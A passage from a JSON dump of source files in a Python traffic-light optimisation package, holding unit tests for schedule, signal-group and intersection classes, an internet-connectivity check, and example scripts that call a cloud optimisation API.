raised\n\n # same but using id\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unkown signal group\n fts.get_greenyellow_intervals(sg3.id)\n\n # THEN an error should be raised\n\n def test_retrieving_single_greenyellow_interval(self):\n \"\"\" test retrieving a single greenyellow interval of a signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=0),\n input_dict[\"greenyellow_intervals\"][\"sg1\"][0])\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=1),\n input_dict[\"greenyellow_intervals\"][\"sg1\"][1])\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg2, k=0),\n input_dict[\"greenyellow_intervals\"][\"sg2\"][0])\n\n def test_retrieving_single_interval_with_id(self):\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN using id should give the same information\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=0),\n fts.get_greenyellow_interval(signalgroup=sg1.id, k=0))\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=1),\n fts.get_greenyellow_interval(signalgroup=sg1.id, k=1))\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg2, k=0),\n fts.get_greenyellow_interval(signalgroup=sg2.id, k=0))\n\n def test_retrieving_single_interval_for_unkown_signalgroup(self):\n \"\"\" test retrieving greenyellow intervals of an unkown signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # unkown signal group\n sg3 = SignalGroup(id=\"sg3\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unkown signal group\n fts.get_greenyellow_interval(sg3, k=0)\n\n # THEN an error should be raised\n\n def test_retrieving_unkown_interval(self):\n \"\"\" test retrieving greenyellow intervals of an unkown signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # unkown signal group\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unkown signal group\n fts.get_greenyellow_interval(sg1, k=2) # has only 2 intervals (with indices k=0 and k=1)\n\n # THEN an error should be raised\n\n\nclass TestFTSJsonConversion(unittest.TestCase):\n\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n\n # WHEN\n fixed_time_schedule = FixedTimeSchedule(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n fts_dict = fixed_time_schedule.to_json()\n fts_from_json = FixedTimeSchedule.from_json(fts_dict=fts_dict)\n self.assertDictEqual(fts_dict, fts_from_json.to_json())\n"
},
{
"alpha_fraction": 0.601645827293396,
"alphanum_fraction": 0.6068271994590759,
"avg_line_length": 40.531646728515625,
"blob_id": "2ccf8e845249bbc8bbe2d2c7158be37e47793da3",
"content_id": "021d3d81fdb9b9968e3e294fc06e0f351c40670e",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6562,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 158,
"path": "/swift_cloud_py/entities/intersection/test/test_signalgroup.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for SignalGroup() \"\"\"\n return dict(id=\"id1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80, min_nr=1, max_nr=2)\n\n def test_successful_validation(self) -> None:\n \"\"\" test initializing SignalGroup object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n SignalGroup(**input_dict)\n\n # THEN no exception should occur\n\n def test_id_not_str(self) -> None:\n \"\"\" test providing the wrong type of id\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id\"] = 1 # not a string\n # WHEN initializing the signal grouip\n signalgroup = SignalGroup(**input_dict)\n\n # THEN should not raise an error, input is converted to string (if possible)\n self.assertEqual(signalgroup.id, \"1\")\n\n def test_wrong_type_numbers(self) -> None:\n \"\"\" test providing the wrong type for numeric arguments\"\"\"\n\n for key in [\"min_greenyellow\", \"max_greenyellow\", \"min_red\", \"max_red\", \"min_nr\", \"max_nr\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the signal group\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_float_instead_of_int(self) -> None:\n \"\"\" test providing float instead of int for min_nr and max_nr\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"min_nr\"] = 2.2\n input_dict[\"max_nr\"] = 3.2\n # WHEN initializing the signal group\n signalgroup = SignalGroup(**input_dict)\n\n # THEN no error should be raised. The number is converted to an int:\n self.assertEqual(signalgroup.min_nr, 2)\n self.assertEqual(signalgroup.max_nr, 3)\n\n def test_min_nr_below_one(self):\n \"\"\" test min_nr being smaller than one\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"min_nr\"] = 0\n\n with self.assertRaises(ValueError):\n # WHEN initializing the signal group\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_negativity(self) -> None:\n \"\"\" Test providing negative values for min_greenyellow, max_greenyellow, min_red, max_red, min_nr, max_nr \"\"\"\n\n for key in [\"min_greenyellow\", \"max_greenyellow\", \"min_red\", \"max_red\", \"min_nr\", \"max_nr\"]:\n with self.subTest(f\"Negative input for '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = -0.1 # values should be non-negative\n with self.assertRaises(ValueError):\n # WHEN initializing the SignalGroup\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_being_zero(self) -> None:\n \"\"\" Test providing zero values for max_greenyellow and max_red\"\"\"\n\n for key in [\"max_greenyellow\", \"max_red\"]:\n with self.subTest(f\"Zero input for '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 0.0 # values should be non-negative\n with self.assertRaises(ValueError):\n # WHEN initializing the SignalGroup\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_max_smaller_than_min(self) -> None:\n \"\"\" Test maximum value being smaller then minimum value, e.g., for maximum and minimum greenyellow times \"\"\"\n\n for min_var, max_var in [(\"min_greenyellow\", \"max_greenyellow\"), (\"min_red\", \"max_red\"), (\"min_nr\", \"max_nr\")]:\n with self.subTest(f\"{max_var} smaller than {min_var}\"):\n with self.assertRaises(ValueError):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[min_var] = 2.2 # all arguments are numbers\n input_dict[max_var] = 1.2 # all arguments are numbers\n # WHEN initializing the signalgroup\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_type_for_traffic_lights(self) -> None:\n \"\"\" test providing the wrong type for traffic_lights (not a list)\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"traffic_lights\"] = \"wrong type\" # all arguments are non-negative numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the signal group\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_type_for_elements_of_traffic_lights(self) -> None:\n \"\"\" test providing the wrong type for traffic_lights (not a list)\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"traffic_lights\"][0] = \"wrong type\" # all arguments are non-negative numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the signal group\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n signalgroup = SignalGroup(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n signalgroup_dict = signalgroup.to_json()\n signalgroup_from_json = SignalGroup.from_json(signalgroup_dict=signalgroup_dict)\n self.assertDictEqual(signalgroup_dict, signalgroup_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6950585246086121,
"alphanum_fraction": 0.6970090866088867,
"avg_line_length": 37.45000076293945,
"blob_id": "f2501417fb435d4fb39752d4d3032d6d81072350",
"content_id": "8bdb6792b4a2918e957953479f17fcc80fcc27d6",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1538,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 40,
"path": "/swift_cloud_py/authentication/check_internet_connection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import socket\nfrom collections import Callable\n\nfrom swift_cloud_py.common.errors import NoInternetConnectionException\n\n\ndef has_internet_connection() -> bool:\n \"\"\"\n test whether a working internet connection is present\n :return: boolean indicating presence of working internet connection\n \"\"\"\n\n # test if we could connect to either one of the following websites; it is highly improbable that all of them\n # are down.\n for website in [\"www.google.com\", \"www.amazon.com\"]:\n try:\n host = socket.gethostbyname(website)\n s = socket.create_connection((host, 80), 2)\n s.close()\n return True # connection was established; assuming internet connection is available\n except socket.gaierror: # could not establish connection with the website\n pass\n\n return False # no connection could be established; assuming not internet connection is available\n\n\ndef ensure_has_internet(func: Callable) -> Callable:\n \"\"\"\n wrapper function that can be used as a decorator around the methods of SwiftMobilityCloudApi; it ensures that an\n internet connection is present (if not an error is raised).\n :param func: method of SwiftMobilityCloudApi.\n :return: wrapped method.\n \"\"\"\n # args and kwargs to allow for methods that have multiple named and unnamed arguments\n def wrapper(*args, **kwargs):\n if not has_internet_connection():\n raise NoInternetConnectionException()\n return func(*args, **kwargs)\n\n return wrapper\n"
},
{
"alpha_fraction": 0.5914227366447449,
"alphanum_fraction": 0.6101334095001221,
"avg_line_length": 44.74576187133789,
"blob_id": "a53a3bf94264a049bbf0353dbe2c0b8f0c3cf590",
"content_id": "fe0114d90964855edcd6728d6b201d3d7bb8345c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10796,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 236,
"path": "/swift_cloud_py/entities/intersection/test/test_intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom itertools import product\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for Intersection() \"\"\"\n signalgroups = [SignalGroup(id=f\"sg{i+1}\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80) for i in range(6)]\n conflicts = [Conflict(id1=\"sg1\", id2=\"sg2\", setup12=1, setup21=2),\n Conflict(id1=\"sg1\", id2=\"sg6\", setup12=1, setup21=2),\n Conflict(id1=\"sg2\", id2=\"sg6\", setup12=1, setup21=2)]\n sync_starts = [SyncStart(from_id=\"sg1\", to_id=\"sg3\")]\n offsets = [Offset(from_id=\"sg1\", to_id=\"sg4\", seconds=10)]\n periodic_orders = [PeriodicOrder(order=[\"sg1\", \"sg2\", \"sg6\"])]\n greenyellow_leads = [GreenyellowLead(from_id=\"sg1\", to_id=\"sg5\", min_seconds=1, max_seconds=10)]\n greenyellow_trails = [GreenyellowTrail(from_id=\"sg5\", to_id=\"sg1\", min_seconds=2, max_seconds=8)]\n return dict(signalgroups=signalgroups, conflicts=conflicts, sync_starts=sync_starts,\n offsets=offsets, greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails,\n periodic_orders=periodic_orders)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Intersection object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n Intersection(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_type(self) -> None:\n \"\"\" Test providing the wrong type of arguments (no list)\"\"\"\n\n # WHEN an input contains the wrong data type\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 10 # wrong type (not a list)\n with self.assertRaises(TypeError):\n # WHEN initializing the intersection\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_type_in_list(self) -> None:\n \"\"\" Test providing the wrong type of elements inside the arguments (which are lists) \"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key].append(10) # add other object (of wrong type) to the list\n with self.assertRaises(TypeError):\n # WHEN initializing the intersection\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_ids_not_unique(self) -> None:\n \"\"\" Test for multiple signal groups having the same id \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN an id is used twice\n input_dict[\"signalgroups\"][-1].id = \"sg1\" # other object (of wrong type) to the list\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_unknown_ids(self) -> None:\n \"\"\" Test unknown ids being used in relations between signal groups \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN an unknown id is used in a relations between signal groups\n for key in [\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"]:\n if key == \"conflicts\":\n input_dict[key][0].id1 = \"unknown\"\n else:\n input_dict[key][0].from_id = \"unknown\"\n with self.subTest(f\"Unknown id used in input '{key}'\"):\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_multiple_relations(self) -> None:\n \"\"\" Test multiple relations being provided for the same pair of signal groups \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN two signal group relations exist for the same signal group pair\n id1 = \"new_id1\"\n id2 = \"new_id2\"\n for key1, key2 in product([\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"],\n [\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"]):\n if key1 == key2:\n continue\n\n if key1 == \"conflicts\":\n input_dict[key1][0].id1 = id1\n input_dict[key1][0].id2 = id2\n else:\n input_dict[key1][0].from_id = id2\n input_dict[key1][0].to_id = id1\n\n if key2 == \"conflicts\":\n input_dict[key2][0].id1 = id1\n input_dict[key2][0].id2 = id2\n else:\n input_dict[key2][0].from_id = id2\n input_dict[key2][0].to_id = id1\n\n with self.subTest(f\"Two relations ('{key1}' and '{key2}') for same signalgroup pair\"):\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_setup_to_small(self) -> None:\n \"\"\" Test for setup time being too small \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN setup12 plus min_greenyellow of signal group sg1 is not strictly positive\n for setup12 in [-10, -11]: # equal to min_greenyellow or even smaller\n with self.subTest(f\"setup too small: '{setup12}'\"):\n input_dict[\"conflicts\"][0].setup12 = setup12\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_unknown_ids_in_periodic_order(self):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n input_dict[\"periodic_orders\"] = [PeriodicOrder([\"sg1\", \"sg2\", \"unknown_id\"])]\n\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n def test_subsequent_non_conflicting_ids_in_periodic_order(self):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n input_dict[\"periodic_orders\"] = [PeriodicOrder([\"sg1\", \"sg2\", \"sg3\"])]\n\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n\nclass TestGettingSignalGroup(unittest.TestCase):\n \"\"\"Test retrieving signal group by id from intersection object\"\"\"\n\n def test_getting_signal_group(self):\n \"\"\" Test retrieving signal group by id \"\"\"\n # GIVEN\n signalgroup1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n signalgroup2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[], sync_starts=[],\n offsets=[], greenyellow_leads=[])\n\n # WHEN/THEN\n self.assertEqual(intersection.get_signalgroup(signalgroup_id=\"sg1\"), signalgroup1)\n self.assertEqual(intersection.get_signalgroup(signalgroup_id=\"sg2\"), signalgroup2)\n\n def test_getting_non_existing_signal_group(self):\n \"\"\" Test retrieving signal group by id when this id does not exist \"\"\"\n # GIVEN\n signalgroup1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n signalgroup2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[], sync_starts=[],\n offsets=[], greenyellow_leads=[])\n\n with self.assertRaises(ValueError):\n # WHEN\n intersection.get_signalgroup(signalgroup_id=\"sg3\")\n\n # THEN an error should be raised\n\n\nclass TestOtherRelations(unittest.TestCase):\n def test_other_relations(self) -> None:\n \"\"\" Test if the attribute other_relation containers all other relations (sync starts,\n offsets and greenyellow-leads)\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN an unknown id is used in a relations between signal groups\n intersection = Intersection(**input_dict)\n\n other_relations = intersection.other_relations\n # THEN other_relations is the list of all sync_starts, offsets and greenyellow-leads\n self.assertEqual(len(input_dict[\"sync_starts\"]) + len(input_dict[\"offsets\"]) +\n len(input_dict[\"greenyellow_leads\"]) + len(input_dict[\"greenyellow_trails\"]),\n len(other_relations))\n for key in [\"sync_starts\", \"offsets\", \"greenyellow_leads\"]:\n with self.subTest(f\"'{key}' in other_relations\"):\n for other_relation in input_dict[key]:\n self.assertIn(other_relation, other_relations)\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" Test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n intersection = Intersection(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n intersection_dict = intersection.to_json()\n intersection_from_json = Intersection.from_json(intersection_dict=intersection_dict)\n self.assertDictEqual(intersection_dict, intersection_from_json.to_json())\n"
},
{
"alpha_fraction": 0.7383720874786377,
"alphanum_fraction": 0.7449128031730652,
"avg_line_length": 49.34146499633789,
"blob_id": "a77d68c1aa80a69b8bf9a41e46fa4dde2aabf6a1",
"content_id": "b294a45efd350151b1144ecfe968e84f2cec8a1c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4128,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 82,
"path": "/swift_cloud_py/examples/minimizing_delay.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef minimizing_delay(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example (given a traffic scenario) we search for the fixed-time schedule that minimizes the average\n delay that road uses (arriving during an horizon of 2 hours) are expected to experience at the intersection.\n\n Use case:\n This enables real-time optimization of traffic light control allowing truly dynamic and smart traffic\n light control that automatically adapts to the traffic situation. For example, by periodically computing the\n optimal fixed-time schedule, and automatically converting it to a vehicle-actuated controller (e.g., using\n the green times as maximum green times and allowing green times to be terminated prematurely).\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # intersection becomes oversaturated\n scaling_factor = 1.3\n logging.info(f\"Increasing original amount of traffic with {(scaling_factor - 1) * 100:.2f}%\")\n arrival_rates *= scaling_factor\n initial_queue = 25\n logging.info(f\"Adding initial queue of {initial_queue: d} PCE/cyclists/pedestrians to each queue\")\n id_to_queue_lengths = dict()\n for signalgroup in intersection.signalgroups:\n id_to_queue_lengths[signalgroup.id] = [initial_queue for _ in signalgroup.traffic_lights]\n initial_queue_lengths = QueueLengths(id_to_queue_lengths=id_to_queue_lengths)\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2, initial_queue_lengths=initial_queue_lengths)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n minimizing_delay()\n"
},
{
"alpha_fraction": 0.7410272359848022,
"alphanum_fraction": 0.7507734894752502,
"avg_line_length": 58.30275344848633,
"blob_id": "9c7657e24df1bd0c47b4f1f49ff17270cfc9c194",
"content_id": "ef4c2a5919b0f5f5c3fb9e78741633415a322935",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6464,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 109,
"path": "/swift_cloud_py/examples/maximizing_intersection_capacity.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef maximize_intersection_capacity(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example (given a traffic scenario) we search for the fixed-time schedule that maximizes the largest\n increase in traffic (scaling factor) that the intersection is able handle without becoming unstable/oversaturated.\n\n This is very useful information as it gives an indication as to how close the intersection is to being\n oversaturated.\n - An objective value of f < 1 indicates that the intersection is oversaturated for all (!) possible\n fixed-time schedules. For example, if f=0.8 then it is impossible to prevent oversaturation (with any\n traffic light controller!) unless the amount of traffic at the intersection decreases by at least 20%\n (=(1-0.8)*100)).\n - An objective value of > 1 indicates that it is possible to prevent oversaturation at this intersection.\n For example, if f=1.2, then the amount of traffic arriving at the intersection may still increase by 20% without\n the intersection becoming oversaturated (under optimal traffic light control!)\n\n Usecase 1: Monitoring\n We can in real-time monitor the traffic situation and quantify the amount of traffic arriving at the intersection.\n This information can again be used for traffic management (e.g., redirect traffic to relieve highly congested parts\n of the network).\n\n Usecase 2: Smart traffic-light control\n Low-traffic and high-traffic situations require a different control strategy. We can periodically evaluate the\n traffic situation in an automated manner (e.g., every 30 minutes). Based on the result (the value of f) we can\n (automatically!) select the control strategy that best matches the current traffic situation;\n this would be truly smart traffic-light control!\n\n Usecase 3: Quantitative support to decide which traffic-light control to update.\n Suppose traffic flow is not as smooth as desired at an intersection (e.g., queue lengths are large) while we can\n quantify the intersection to have sufficient capacity (e.g., f < 0.8). It, might be sensible to reevaluate the\n currently used traffic-light controller (and potentially update this controller). In this way, we can decide\n which traffic-light controllers need to be updated and focus effort on these controllers.\n\n On the other hand, if the capacity of the intersection is expected to be insufficient as well (e.g., f > 1.0), then\n this might motivate infrastructural changes (see next usecase).\n\n Usecase 4: Support for strategic decision making on infrastructural changes to the road network.\n Traffic situations may change overtime (e.g., due to urban development). Therefore, it is very important to\n periodically evaluate if any infrastructural changes (or policy changes by the government) are needed.\n\n This is a very difficult decision to be made with high impact; quantitative support is really useful when making\n these decisions. It is now possible, to evaluate the maximum traffic increase that the intersection/infrastructure\n is able to handle under optimal traffic light control. This could be used to answer questions like: is the\n capacity of our infrastructure (intersection) expected to still be sufficient in 3 years?\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Maximizing capacity of the intersection\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.max_capacity)\n\n logging.info(f\"Maximum sustainable increase in traffic {(objective_value - 1) * 100:.2f}%\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n scaling_factor = 1.2\n logging.info(f\"Increasing original amount of traffic with {(scaling_factor - 1) * 100:.2f}%\")\n arrival_rates *= scaling_factor\n logging.info(f\"Expected maximum sustainable increase: {(objective_value/scaling_factor - 1) * 100:.2f}%\")\n\n logging.info(f\"Maximizing capacity of the intersection with scaled 